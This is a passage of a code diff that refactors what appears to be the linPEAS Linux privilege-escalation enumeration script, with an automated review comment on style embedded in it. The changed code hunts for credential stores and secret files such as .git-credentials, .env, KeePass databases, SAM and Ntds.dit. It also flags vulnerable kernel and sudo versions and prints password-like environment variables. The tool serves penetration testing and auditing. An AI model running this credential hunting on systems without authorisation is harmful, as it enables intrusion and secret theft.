+ PSTORAGE_SNMP=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_PYPIRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.pypirc$" | sort | uniq | head -n 70)
+ PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.cloudflared$" | sort | uniq | head -n 70)
+ PSTORAGE_HISTORY=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\..*_history$" | sort | uniq | head -n 70)
+ PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "httpd\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_HTPASSWD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.htpasswd$" | sort | uniq | head -n 70)
+ PSTORAGE_LDAPRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E 
"\.ldaprc$" | sort | uniq | head -n 70)
+ PSTORAGE_ENV=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.env$" | sort | uniq | head -n 70)
+ PSTORAGE_MSMTPRC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.msmtprc$" | sort | uniq | head -n 70)
+ PSTORAGE_GITHUB=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70)
+ PSTORAGE_SVN=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E 
"^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.svn$" | sort | uniq | head -n 70)
+ PSTORAGE_KEEPASS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70)
+ PSTORAGE_FTP=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|ws_ftp\.ini$" | sort | uniq | head -n 70)
+ PSTORAGE_BIND=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "bind$" | sort | uniq | head -n 70)
+ PSTORAGE_SEEDDMS=$(echo -e 
"$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | 
grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|php\.ini$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security$|security\.sav$|server\.xml$|services\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e 
"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + + ##### POST SERACH VARIABLES ##### - backup_folders=`echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS" | tr ' ' '\n' | grep -v "/lib" | grep -E "backup$|backups$"` - backup_folders_row="`echo $backup_folders | tr '\n' ' '`" - printf $Y"DONE\n"$NC + backup_folders_row="`echo $PSTORAGE_BACKUPS | tr '\n' ' '`" + printf ${YELLOW}"DONE\n"$NC echo "" fi 
@@ -1099,27 +1181,27 @@ if [ "`echo $CHECKS | grep SysI`" ]; then ########################################### #-------------) System Info (-------------# ########################################### - printf $B"════════════════════════════════════╣ "$GREEN"System Information"$B" ╠════════════════════════════════════\n"$NC + print_title "System Information" #-- SY) OS - printf $Y"[+] "$GREEN"Operative system\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits\n"$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelB,${C}[1;31m&${C}[0m," + print_2title "Operative system" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" + (cat /proc/version || uname -a ) 2>/dev/null | sed 
-${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," lsb_release -a 2>/dev/null echo "" - #-- SY) Sudo - printf $Y"[+] "$GREEN"Sudo version\n"$NC + #-- SY) Sudo + print_2title "Sudo version" if [ "`command -v sudo 2>/dev/null`" ]; then - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version\n"$NC - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${C}[1;31m&${C}[0m," + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" + sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," else echo_not_found "sudo" fi echo "" #--SY) USBCreator - printf $Y"[+] "$GREEN"USBCreator\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation\n"$NC + print_2title "USBCreator" + print_info 
"https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") if [ -z "$pc_version" ]; then 
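Review bot: `print_2title "Operative system"` carries a wording slip into the new user-facing title; the usual term is `print_2title "Operating system"`. The kernel-version line on the new side still chains twenty separate `sed` processes, one per `$kernelDCW_*` pattern, where a single `sed -${E} -e "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," -e "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," …` spawns one process and reads more easily; output is identical because each `-e` expression is applied in turn to the pattern space exactly as the pipeline does. Both points are style only.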
@@ -1130,53 +1212,54 @@ if [ "`echo $CHECKS | grep SysI`" ]; then pc_major=$(echo "$pc_version" | cut -d. -f1) pc_minor=$(echo "$pc_version" | cut -d. -f2) if [ $pc_length -eq 4 -a $pc_major -eq 0 -a $pc_minor -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," fi fi fi echo "" #-- SY) PATH - printf $Y"[+] "$GREEN"PATH\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses\n"$NC - echo $OLDPATH 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${C}[1;31;103m&${C}[0m,g" + print_2title "PATH" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" + echo $OLDPATH 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" + echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" echo "" #-- SY) Date - printf $Y"[+] "$GREEN"Date\n"$NC + print_2title "Date" date 2>/dev/null || echo_not_found "date" echo "" #-- SY) System stats - printf $Y"[+] "$GREEN"System stats\n"$NC + print_2title "System stats" (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" free 2>/dev/null || echo_not_found "free" echo "" - + #-- SY) CPU info - printf $Y"[+] "$GREEN"CPU info\n"$NC + print_2title "CPU info" lscpu 2>/dev/null || echo_not_found "lscpu" echo "" - #-- SY) Environment vars - printf $Y"[+] "$GREEN"Environment\n"$NC - printf $B"[i] "$Y"Any private information inside environment variables?\n"$NC - (env || set) 2>/dev/null | grep -v 
"RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|sudocapsB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${C}[1;31m&${C}[0m,g" || echo_not_found "env || set" + #-- SY) Environment vars + print_2title "Environment" + print_info "Any private information inside environment variables?" + (env || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|sudocapsB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${SED_RED},g" || echo_not_found "env || set" echo "" #-- SY) Dmesg - printf $Y"[+] "$GREEN"Searching Signature verification failed in dmseg\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed\n"$NC + print_2title "Searching Signature verification failed in dmseg" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" 